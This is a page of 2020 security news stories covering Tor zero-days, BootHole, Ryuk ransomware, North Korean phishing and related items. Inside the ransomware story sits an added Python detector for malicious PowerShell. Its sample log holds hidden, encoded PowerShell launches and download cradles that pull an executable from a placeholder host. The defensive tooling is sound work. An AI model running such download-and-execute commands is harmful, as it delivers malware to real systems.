More stories


    Two Tor zero-days disclosed, more to come

    Image: Tor Project

    Over the past week, a security researcher has published technical details about two vulnerabilities impacting the Tor network and the Tor browser.
    In blog posts last week and today, Dr. Neal Krawetz said he was going public with details on two zero-days after the Tor Project had repeatedly failed to address multiple security issues he reported over the past few years.
    The researcher also promised to reveal at least three more Tor zero-days, including one that can reveal the real-world IP address of Tor servers.
    Approached for comment on Dr. Krawetz’s intentions, the Tor Project did not reply to a request for comment or provide additional details on its stance on the matter.
    The first Tor zero-day
    Dr. Krawetz, who operates multiple Tor nodes himself and has a long history of finding and reporting Tor bugs, disclosed the first Tor zero-day last week.

    In a blog post dated July 23, the researcher described how companies and internet service providers could block users from connecting to the Tor network by scanning network connections for “a distinct packet signature” that is unique to Tor traffic.
    The packet could be used as a way to block Tor connections from initiating and effectively ban Tor altogether — an issue that oppressive regimes are very likely to abuse.
    The second Tor zero-day
    Earlier today, in a blog post shared with ZDNet, Dr. Krawetz disclosed a second issue. This one, like the first, allows network operators to detect Tor traffic.
    However, while the first zero-day could be used to detect direct connections to the Tor network (to Tor guard nodes), the second one can be used to detect indirect connections.
    These are connections that users make to Tor bridges, a special type of entry point into the Tor network that can be used when companies and ISPs block direct access to the Tor network.
    Tor bridges act as proxy points and relay connections from the user to the Tor network itself. Because they are sensitive Tor servers, the list of Tor bridges is constantly updated to make it difficult for ISPs to block them.
    But Dr. Krawetz says connections to Tor bridges can be easily detected, as well, using a similar technique of tracking specific TCP packets.
    “Between my previous blog entry and this one, you now have everything you need to enforce the policy [of blocking Tor on a network] with a real-time stateful packet inspection system. You can stop all of your users from connecting to the Tor network, whether they connect directly or use a bridge,” Dr. Krawetz said.
    Both issues are specifically concerning for Tor users residing in countries with oppressive regimes.
    Dissatisfaction towards the Tor Project’s security stance
    The reason why Dr. Krawetz is publishing these zero-days is that he believes the Tor Project does not take the security of its networks, tools, and users seriously enough.
    The security researcher cites previous incidents in which he tried to report bugs to the Tor Project, only to be told that they were aware of the issue and working on a fix, which was never actually deployed. These include:
    A bug that allows websites to detect and fingerprint Tor browser users by the width of their scrollbar, which the Tor Project has known about since at least June 2017.
    A bug that allows network adversaries to detect Tor bridge servers using their OR (Onion routing) port, reported eight years ago.
    A bug that lets attackers identify the SSL library used by Tor servers, reported on December 27, 2017.
    All of these issues are still not fixed, which led Dr. Krawetz, in early June 2020, to abandon his collaboration with the Tor Project and take his current approach of publicly shaming the organization into taking action.

    I’m giving up reporting bugs to Tor Project. Tor has serious problems that need to be addressed, they know about many of them and refuse to do anything. I’m holding off dropping Tor 0days until the protests are over. (We need Tor now, even with bugs.) After protests come 0days.
    — Dr. Neal Krawetz (@hackerfactor) June 4, 2020


    US prosecutors seek years in prison for Uber self-driving exec who stole Google trade secrets

    US prosecutors are seeking a total of 27 months behind bars for Anthony Levandowski, the former head of Uber’s self-driving arm who pleaded guilty to stealing trade secrets from Google. 

    Levandowski was indicted by the US Department of Justice (DoJ) on 33 counts of theft and attempted theft in 2019 for stealing intellectual property belonging to his former employer. 
    The ex-Google engineer worked on the tech giant’s self-driving technologies from 2009 to 2016 before abruptly resigning to found his own company. 
    Prosecutors claimed that before he left his post, Levandowski downloaded a treasure trove of 14,000 internal documents relating to engineering, manufacturing, and business, specifically linked to Google’s LiDAR and self-driving car research. 

    Otto, a rival in the same space, was co-founded by the engineer together with Lior Ron. Otto was later acquired by Uber. 
    “All of us have the right to change jobs,” said US Attorney Anderson at the time of the indictment. “None of us has the right to fill our pockets on the way out the door. Theft is not innovation.”
    Levandowski pleaded guilty in March to the theft of trade secrets under a plea agreement. 
    After Google and the company’s self-driving firm Waymo complained that Uber’s innovations in the intelligent vehicle space were made off the back of their own R&D, in 2018, Uber issued Alphabet 0.34% of a late stock offering, the equivalent of $250 million at the time. Levandowski, once the head of Uber’s self-driving team, was fired.
    Uber has taken the stance that none of Waymo’s autonomous vehicle technology ever made it into their own systems, but revised its software nonetheless to stave off any future IP claims. 
    Prosecutors now aim to secure over two years imprisonment, three years of supervised release, and a restitution payment of close to $756,500 which has already been agreed upon between Waymo and Uber, as reported by Reuters. 
    Court documents filed in a Californian court note that Levandowski’s defense team has asked for one year of home confinement and a fine of $95,000. 
    Levandowski filed for bankruptcy earlier this year after being ordered to pay Google $179 million.
    Earlier this month, Uber became subject to a separate complaint filed by unions and representatives of both gig-economy and app-based drivers who are demanding to see the code and algorithms used by the company. The complaint alleges that Uber is not complying with GDPR and that drivers have a right to see any data that could determine their working lives. 
    In May, Uber announced the ax of 3,000 employees on top of 3,700 members of staff laid off previously due to business disruption caused by the COVID-19 pandemic. 


    Ransomware: How clicking on one email left a whole business in big trouble

    Security experts have given an insight into how a targeted ransomware attack took down the network of a food and drink manufacturer after hackers took advantage of common security vulnerabilities.
    The crooks used a phishing attack and took advantage of a number of vulnerabilities – from old hardware to default passwords – to first deploy Emotet and Trickbot malware before delivering the Ryuk ransomware and attempting to extort a fee from the victim to restore the network.


    In this case, the organisation didn’t opt to pay the ransom – something that authorities discourage because it would only fund additional attacks by cyber criminals – but instead had security experts come in to examine the network and restore functionality within 48 hours.
    “This was a targeted attack. This is targeting organisations such as this one which, if they don’t have the security retainer or IT staff, the initial reaction would be to give into the ransomware attack because they want to return their operations quickly,” Bindu Sundaresan, director at AT&T cybersecurity, told ZDNet.

    AT&T investigated the attack and helped the unnamed manufacturer get back online without giving in to the ransom demand, with as little disruption to production as possible. But the company likely would not have fallen victim if basic security vulnerabilities hadn’t allowed the initial stages of the attack to happen.
    Ryuk, like some other forms of ransomware, is deployed as the final stage in a three-pronged attack that also delivers Emotet and Trickbot. Emotet started life as a banking trojan before evolving into a botnet that is leased out to deliver other malware, which in this case is the Trickbot trojan.
    Trickbot is a powerful form of malware that provides attackers with a full backdoor into compromised systems, including the ability to move around networks, issue commands and steal additional data.
    After this, the Ryuk ransomware is downloaded onto the network by the hackers, because cyber criminals view it as the quickest and easiest way to make money from a compromised network.
    While many ransomware campaigns now start with targeting remote ports, this one began with a phishing attack.
    “A user was sent a Microsoft Word document as part of a phishing campaign. It was labelled as an invoice and this user downloaded the document, then malicious code executed a PowerShell command that downloaded an Emotet payload,” Sundaresan explained.
    PowerShell commands generally aren’t required by users who don’t need administrator rights, so if PowerShell had been disabled for those who don’t need it, the cyberattack could’ve been cut off at this point.
    After Emotet formed the initial part of the attack, gaining a foothold in the network, the next step was to use the Trickbot malware to steal login credentials for corporate accounts and cloud services in order to gain access to other parts of the network.
    By exploiting this cycle, cyber criminals were able to gain control of over half the network, before eventually delivering the Ryuk ransomware.
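    The Word-document-to-PowerShell step described above is where the article says the attack could have been cut off. As an added example that is not part of the article or of AT&T’s investigation, the following Python flags that pattern in constructed process-creation records: an Office application spawning a shell, a PowerShell download cradle, hidden/encoded launch flags, and PowerShell run by an account outside an assumed allow-list (the host names, user names and invoice-example.test URL are made up):

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed process-creation records (Sysmon-style: time|host|user|parent|image|command line).
# Hosts, users and the invoice-example.test URL are made up for this example.
SAMPLE_EVENTS = """\
2020-07-20T09:14:03|HOST-ACCT01|jsmith|WINWORD.EXE|powershell.exe|powershell -NoP -w hidden -enc SQBFAFgA...
2020-07-20T09:14:05|HOST-ACCT01|jsmith|powershell.exe|powershell.exe|powershell -c (New-Object Net.WebClient).DownloadFile('http://invoice-example.test/doc.exe','C:\\Users\\jsmith\\AppData\\Local\\Temp\\a.exe')
2020-07-20T09:20:11|HOST-IT02|admin|explorer.exe|powershell.exe|powershell -File C:\\Scripts\\backup.ps1
2020-07-20T09:22:40|HOST-HR03|mlee|EXCEL.EXE|cmd.exe|cmd /c dir
2020-07-20T09:30:00|HOST-ACCT01|jsmith|WINWORD.EXE|powershell.exe|powershell Invoke-WebRequest http://invoice-example.test/x
"""

# Office applications whose child shells are suspicious: a document should not launch an interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and shells that a malicious macro typically launches to stage a payload.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Assumed allow-list: the article's mitigation is to disable PowerShell for everyone who does not need it.
POWERSHELL_ALLOWED_USERS = {"admin"}

# Command-line fragments that indicate a download cradle or an attempt to hide the console.
DOWNLOAD_PATTERNS = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
EVASION_PATTERNS = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-ex(ecutionpolicy)?\s+bypass)",
    re.IGNORECASE,
)


@dataclass
class Event:
    timestamp: str
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Alert:
    timestamp: str
    host: str
    user: str
    severity: str
    reasons: List[str]


def parse_event(line: str) -> Event:
    """Split one pipe-delimited record; the command line may contain '|', so split on the first five only."""
    parts = line.split("|", 5)
    if len(parts) != 6:
        raise ValueError(f"malformed event: {line!r}")
    ts, host, user, parent, image, cmdline = parts
    return Event(ts, host, user, parent.lower(), image.lower(), cmdline)


def assess(ev: Event) -> Optional[Alert]:
    """Return an Alert when the event matches the initial-access chain, else None."""
    reasons = []
    is_powershell = ev.image in POWERSHELL_IMAGES
    if ev.parent in OFFICE_PARENTS and ev.image in SHELL_CHILDREN:
        reasons.append(f"office app {ev.parent} spawned {ev.image}")
    if is_powershell and DOWNLOAD_PATTERNS.search(ev.cmdline):
        reasons.append("powershell download cradle")
    if is_powershell and EVASION_PATTERNS.search(ev.cmdline):
        reasons.append("hidden/encoded/bypass powershell flags")
    if is_powershell and ev.user not in POWERSHELL_ALLOWED_USERS:
        reasons.append(f"powershell run by non-allow-listed user {ev.user}")
    if not reasons:
        return None
    # An Office-spawned shell or a download cradle is the article's initial-access step: rate it high.
    high = any(r.startswith(("office app", "powershell download")) for r in reasons)
    return Alert(ev.timestamp, ev.host, ev.user, "high" if high else "medium", reasons)


def scan(log_text: str) -> List[Alert]:
    """Run assess() over every non-empty record and collect the alerts in log order."""
    alerts = []
    for line in log_text.splitlines():
        if line.strip():
            alert = assess(parse_event(line))
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.timestamp} {a.host} {a.user}: " + "; ".join(a.reasons))
```

On the sample, the admin’s scheduled backup script is the only PowerShell launch that raises nothing, while both Word-spawned launches and the follow-on download are rated high.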
    “Malware like this wants to get the most bang for its buck and go after organisations that are at the point where they feel like they need to give in due to the damage it’s costing to their network, the valuable data that’s being held – so they have a sense of urgency,” said Sundaresan.
    However, the attack could have been much worse: Ryuk had compromised not the entire network but about 60% of it, including ordering and billing applications. This was in part because security personnel were able to contain the attack after being called in by the manufacturer.
    “The ability to contain it and the response time was crucial. The ability to contain the incident is the key to recover from it and having the business up and running before it got to the crucial databases,” Sundaresan explained.
    Within 48 hours, much of the business was back up and running again – crucially without having given into paying a ransom demand to criminals. However, two days of downtime would have been costly to the organisation and restoring the network isn’t likely to have been cheap either – plus there’s the prospect of having to upgrade security in the aftermath, so attackers don’t strike again.
    And like many organisations that fall victim to cyberattacks, this one could’ve prevented itself from falling victim to ransomware by ensuring that cybersecurity hygiene was well managed – but there were simple-to-fix vulnerabilities that attackers were able to take advantage of.
    For example, the vulnerabilities that Emotet, Trickbot and Ryuk take advantage of have been known about for a long time and critical security updates have been issued to protect users – but despite these updates being years old, there are organisations that still haven’t applied them.
    “Microsoft has put out patches but patch management and security hygiene still remain issues for organisations,” said Sundaresan, who added that this ransomware attack could’ve also been prevented if strong passwords and multi-factor authentication had been used to secure systems.
    “A lot of this can be prevented. If they didn’t have default password and end-of-life machines, a lot of this would’ve been prevented.”
    And when it comes to cyberattacks, prevention is the best cure, because not only does it stop your organisation from falling victim to ransomware or other malware, the cost of securing the network in advance is almost certainly going to be less expensive than having to do it in the aftermath of an incident – especially if the attack disrupts operations or causes reputational damage that could keep customers away.
    So while it might potentially seem expensive, it could be very much worth having security experts from outside the organisation come in to examine the network before damage can be done – and not after.
    “Get a security assessment done from an offensive attacker point of view, you don’t want to be just doing the security initiatives from compliance or internal testing – it’s not enough. You have to get your network tested using multiple attack vectors and you have to do it objectively with full penetration testing,” Sundaresan said.
    Because ultimately, ransomware – be it Ryuk or another family – is still out there and still remains a threat because too many organisations aren’t following the security basics. And until this is fixed, ransomware will remain a problem.



    US defense and aerospace sectors targeted in new wave of North Korean attacks

    While the world was in the midst of the COVID-19 pandemic, North Korean hackers were targeting the US defense and aerospace sectors with fake job offers in the hopes of infecting employees looking for better opportunities and gaining a foothold on their organizations’ networks.
    The attacks began in late March and lasted throughout May 2020, cyber-security firm McAfee said in a report published today.

    Image: McAfee
    Tracked under the codename “Operation North Star,” McAfee said these attacks have been linked to infrastructure and TTPs (Tactics, Techniques, and Procedures) previously associated with Hidden Cobra — an umbrella term the US government uses to describe all North Korean state-sponsored hacking groups.
    The good ol’ fake job offer trick
    As for the attacks themselves, McAfee said they were run-of-the-mill spear-phishing emails that enticed recipients to open booby-trapped documents containing a possible job offer.
    Many hacking groups have leveraged this lure in the past, and North Korean hackers also used it before in attacks against the US defense sector in campaigns that took place in 2017 and 2019, Christiaan Beek, Lead Scientist & Senior Principal Engineer, told ZDNet in an email.

    In fact, the 2017 attacks were cited in the US indictment against a North Korean hacker believed to have taken part in the attacks, but also in the creation of the WannaCry ransomware.
    But the 2020 attacks also had their variations — namely the malware they delivered and the fact that some victims were also approached via social networks, and not necessarily via email.
    The entire infection chain, from first contact to how the malware operates, is summarised in the graphic below and detailed in full in the McAfee report.

    Image: McAfee
    Questions, however, remain about the efficacy of this campaign. With workforce movement at an all-time low during the coronavirus pandemic, it’s unclear how successful North Korean hackers were by employing a “new job” theme to lure in victims.
    Unfortunately, McAfee said it didn’t have access to the emails themselves in which these lures were used, and only managed to recover the booby-trapped documents and the malware payloads.
    As a result, McAfee wasn’t able to determine with precision which US defense or aerospace companies were the targets of these attacks and then notify each.
    The only things they could determine were the nature of the fake job positions (Senior Design Engineer and System Engineer) and the US defense programs hackers were trying to “recruit” for:
    F-22 Fighter Jet Program
    Defense, Space, and Security (DSS)
    Photovoltaics for space solar cells
    Aeronautics Integrated Fighter Group
    Military aircraft modernization programs
    Raj Samani, McAfee Chief Scientist, told ZDNet yesterday that they have reached out to US cyber-security agencies to notify authorities of the past attacks as part of their normal deconfliction procedures whenever they discover campaigns like these ones.
    Attacks focused on intelligence gathering
    The point of these attacks was also pretty clear, with the North Star campaign being part of North Korea’s cyber-espionage and intelligence-gathering efforts.
    With the country under heavy economic sanctions and lacking a self-sustaining military-industrial complex, it can only support its nuclear weapons program and ambitions by importing or stealing the information it needs — which in this case, it was hoping to obtain from US defense and aerospace contractors.
    However, another way through which North Korea sustains its nuclear program is by allowing its hackers to engage in mundane cybercrime and launder the money back into the hermit kingdom. In similar news this week, security firm Kaspersky published research on Tuesday linking North Korea’s hackers to a new strain of ransomware named VHD.
    Prior to that, the group was also linked to all sorts of cybercrime, such as BEC operations, Magecart attacks, bank cyber-heists, cryptocurrency hacks and scams, ATM cashouts, and crypto-mining botnets.
    Despite being a small and walled-off nation, North Korea has built one of the most powerful and advanced armies of hackers to date, and the diversity of its operations proves this point.


    Linux distros fix new Boothole bug


    Secure Boot, despite the name, isn’t as secure as we’d like. Security company Eclypsium discovered a security hole in GRUB2: BootHole. Linux users know GRUB2 as one of the most commonly used bootloaders. As such, this security problem makes any machine potentially vulnerable to a possible attack — the keyword is “potentially.”
    BootHole enables hackers to insert and execute malicious code during the boot-loading process. Once planted there, the nasty bootkit payload can allow attackers to plant code that later takes over the operating system. Fortunately, Linux distro developers were warned of this problem, and most of them have already issued patches.
    Furthermore, to use BootHole, a hacker has to edit grub.cfg, the GRUB2 configuration file. Therefore, to successfully attack a Linux system, an attacker must already have root-level access to the target system. Practically speaking, such a hacker has already compromised the system. With such access, attackers can modify grub.cfg values to trigger a buffer overflow, which can then be used to insert a malware payload.
    While Eclypsium found the initial GRUB2 problem, Linux developers found other trouble hiding within GRUB2. Joe McManus, Canonical’s security engineering director, said:

    “Thanks to Eclypsium, we at Canonical, along with the rest of the open-source community, have updated GRUB2 to defend against this vulnerability. During this process, we identified seven additional vulnerabilities in GRUB2, which will also be fixed in the updates released today. The attack itself is not a remote exploit and it requires the attacker to have root privileges. With that in mind, we do not see it being a popular vulnerability used in the wild. However, this effort really exemplifies the spirit of community that makes open source software so secure.”

    Red Hat is also on the case. Peter Allor, Red Hat’s director of Product Security, said:

    “Red Hat is aware of a flaw (CVE-2020-10713) in GRUB 2. Product Security has conducted a thorough analysis and understands not only how this flaw impacts Red Hat products, but most importantly how this impacts the Linux kernel. Our PSIRT has been working closely with engineering, cross-functional teams, the Linux community as well as our industry partners to deliver currently available updates for affected Red Hat products, including Red Hat Enterprise Linux.”

    Marcus Meissner, the lead of the SUSE Security Team, points out, however, that while the problem is serious and needs patching, it’s not that bad. He observed:

    “Given the need for root access to the bootloader, the described attack appears to have limited relevance for most cloud computing, data center, and personal device scenarios, unless these systems are already compromised by another known attack. However, it does create an exposure when untrusted users can access a machine, e.g. bad actors in classified computing scenarios or computers in public spaces operating in unattended kiosk mode.”

    So, the moral of the story is that, while you should patch your Linux system, this security hole is really only a problem in a very few limited situations. 


    Kaspersky: New hacker-for-hire mercenary group is targeting European law firms

    Image: Screengrab from Kaspersky webinar


    Russian cyber-security firm Kaspersky said today in a webinar that it discovered a new hacker-for-hire mercenary group that appears to have been active for almost a decade.
    The group, which Kaspersky codenamed Deceptikons, has primarily targeted law firms and fintech companies, according to Kaspersky malware analyst Vicente Diaz.
    The Kaspersky researcher said the group appears to be focused on stealing business and financial secrets, rather than government-related information.
    Diaz said most of the group’s targets are located in Europe, and occasionally some Middle East countries like Israel, Jordan, and Egypt.
    The Deceptikons group’s most recent attacks included a 2019 spear-phishing campaign against a set of European law firms, where the group deployed malicious PowerShell scripts to infect hosts.
    Deceptikons doesn’t use zero-days

    “The group is not technically sophisticated and has not, to our knowledge, deployed zero-day exploits,” the Russian security firm said today in a separate written report that accompanied its webinar.
    Kaspersky described the group’s infrastructure and malware as “clever, rather than technically advanced” and with a focus on gaining persistence on infected hosts.
    Most attacks seem to follow a similar pattern, starting with a spear-phishing email that carries a malicious modified LNK (shortcut) file.
    If the victims download and interact with the file (such as clicking it), the shortcut downloads and runs a PowerShell-based backdoor trojan.
    Diaz said Kaspersky would be publishing a more complete technical report on Deceptikons activities in the coming weeks.
    Second hacker-for-hire group exposed this year
    This is the second major hacker-for-hire mercenary group that came to light this year after Citizen Lab exposed Indian firm BellTroX InfoTech Services as the group behind the Dark Basin APT.
    Kaspersky did not link Deceptikons to any real-world entity, however, at least for the time being.


    'BootHole' attack impacts Windows and Linux systems using GRUB2 and Secure Boot

    Image: Eclypsium

    Details about a new vulnerability in a core component of the Secure Boot process have been published today.
    The vulnerability, codenamed BootHole, allows attackers to tamper with the boot-loading process that precedes starting up the actual operating system (OS).
    This process relies on components known as bootloaders that are responsible for loading the firmware of all computer hardware components on which the actual OS runs.
    BootHole is a vulnerability in GRUB2, one of today’s most popular bootloader components. Currently, GRUB2 is used as the primary bootloader for all major Linux distros, but it can also boot and is sometimes used for Windows, macOS, and BSD-based systems as well.
    How BootHole works
    The BootHole vulnerability was discovered earlier this year by security researchers from Eclypsium. The actual full technical details about the bug have been published today on the Eclypsium blog.

    Researchers say BootHole allows attackers to tamper with the GRUB2 component to insert and execute malicious code during the boot-loading process, effectively allowing attackers to plant code that gains full control of the OS once it is launched later.
    This type of malware is usually known as a bootkit because it lives inside bootloaders, in the motherboard physical memory, in locations separate from the actual OS, allowing it to survive OS reinstalls.
    According to Eclypsium, the actual BootHole vulnerability is located inside grub.cfg, a configuration file separate from the actual GRUB2 component, from where the bootloader pulls system-specific settings. Eclypsium says that attackers can modify values in this file to trigger a buffer overflow inside the GRUB2 component when it reads the file on every OS boot.
    The image below shows a simplified explanation of the BootHole attack, where attackers can piggyback on the “overflowing” code from one or more grub.cfg options to execute malicious commands inside the GRUB2 component.

    Eclypsium says BootHole can be (ab)used to tamper with the bootloader, or even replace it with a malicious or vulnerable version.

    Making matters worse, Eclypsium says that a BootHole attack also works even when servers or workstations have Secure Boot enabled.
    Secure Boot is a process where the server/computer uses cryptographic checks to make sure the boot process loads only cryptographically signed firmware components.
    The BootHole attack works even with Secure Boot enabled because, for some devices or OS setups, the Secure Boot process doesn’t cryptographically verify the grub.cfg file, allowing attackers to tamper with its content.

    Some limitations to this attack also exist. Eclypsium says that the attacker needs admin access in order to tamper with the grub.cfg file. This looks like a limitation, but in reality, it is not. Operating systems and their components are littered with “elevation of privilege” bugs that could be exploited as part of a BootHole attack chain to let malware gain admin access and modify grub.cfg.
    Furthermore, the Secure Boot process was specifically created to prevent even high-privileged admin accounts from compromising the boot process, meaning that BootHole is a major security hole in one of the IT ecosystem’s most secure operations.
    Patches coming later today
    For the past several months, Eclypsium says it has been notifying the entire hardware and software ecosystem about BootHole (CVE-2020-10713).
    The company estimates that every Linux distribution is impacted by this vulnerability, as all use GRUB2 bootloaders that read commands from an external grub.cfg file.
    “To date, more than 80 shims are known to be affected,” Eclypsium said. Shims are components that allow vendor/OEM-specific firmware code to interact with GRUB2.
    “In addition to Linux systems, any system that uses Secure Boot with the standard Microsoft UEFI CA is vulnerable to this issue,” the research team added, speaking about GRUB2’s possible impact on other operating systems that use GRUB2 in a Secure Boot process.
    “As a result, we believe that the majority of modern systems in use today, including servers and workstations, laptops and desktops, and a large number of Linux-based OT and IoT systems, are potentially affected by these vulnerabilities.”
    Eclypsium says that starting today and for the coming days and weeks, all sorts of IT companies are expected to release patches to address BootHole in their products.
    The security vendor said it expected security alerts and patches from:
    Microsoft
    UEFI Security Response Team (USRT)
    Oracle
    Red Hat (Fedora and RHEL)
    Canonical (Ubuntu)
    SuSE (SLES and openSUSE)
    Debian
    Citrix
    HP
    VMware
    OEMs
    Software vendors, including security software
    Eclypsium said it expects patching to take a long while, as fixing bootloader bugs is usually a complex process due to the multitude of components and the cryptography involved. In any case, look for CVE-2020-10713 patches in future changelogs.


    Microsoft to remove all SHA-1 Windows downloads next week

    Microsoft announced this week plans to remove all Windows-related file downloads from the Microsoft Download Center that are cryptographically signed with the Secure Hash Algorithm 1 (SHA-1).
    The files will be removed next Monday, on August 3, the company said on Tuesday.
    The OS maker cited the security of the SHA-1 algorithm for the move.
    “SHA-1 is a legacy cryptographic hash that many in the security community believe is no longer secure. Using the SHA-1 hashing algorithm in digital certificates could allow an attacker to spoof content, perform phishing attacks, or perform man-in-the-middle attacks,” it said.
    SHA-1, broken since 2016
    Most software companies have recently begun abandoning the SHA-1 algorithm after a team of academics broke the SHA-1 hashing function at a theoretical level in February 2016.

    The algorithm was broken in a real-world practical attack in February 2017, when Google cryptographers disclosed SHAttered, a technique that could make two different files appear as if they had the same SHA-1 hash.
    At the time, creating an SHA-1 collision was considered computationally expensive, and Google experts thought SHA-1 could still be used in practice for at least half a decade until the cost would go down.
    However, subsequent research released in May 2019 and in January 2020 detailed an updated methodology that cut the cost of an SHA-1 collision attack to under $110,000 and then to under $50,000.
    Since 2016, software makers have abandoned SHA-1, mainly for SHA-2. Google removed SHA-1 support from Chrome with the release of Chrome 56, at the end of January 2017; Firefox removed SHA-1 support in Firefox 51, also released at the end of January 2017; and Microsoft dropped support for SHA-1 in Edge and Internet Explorer in mid-2017.
    Apple followed by removing SHA-1 from iOS 13 and macOS Catalina, and OpenSSH announced plans to deprecate SHA-1 for its login process earlier this year.
    Microsoft, since August 2019, no longer uses SHA-1 to sign and authenticate Windows OS updates. Currently, Microsoft is in the process of replacing SHA-1 with SHA-2 across its products.
    However, the OS maker didn’t specify whether the Windows-related files being removed from its download center on Monday will be replaced with new download links signed with SHA-2, leaving many to wonder if they’ll ever be able to download some of Microsoft’s old tools.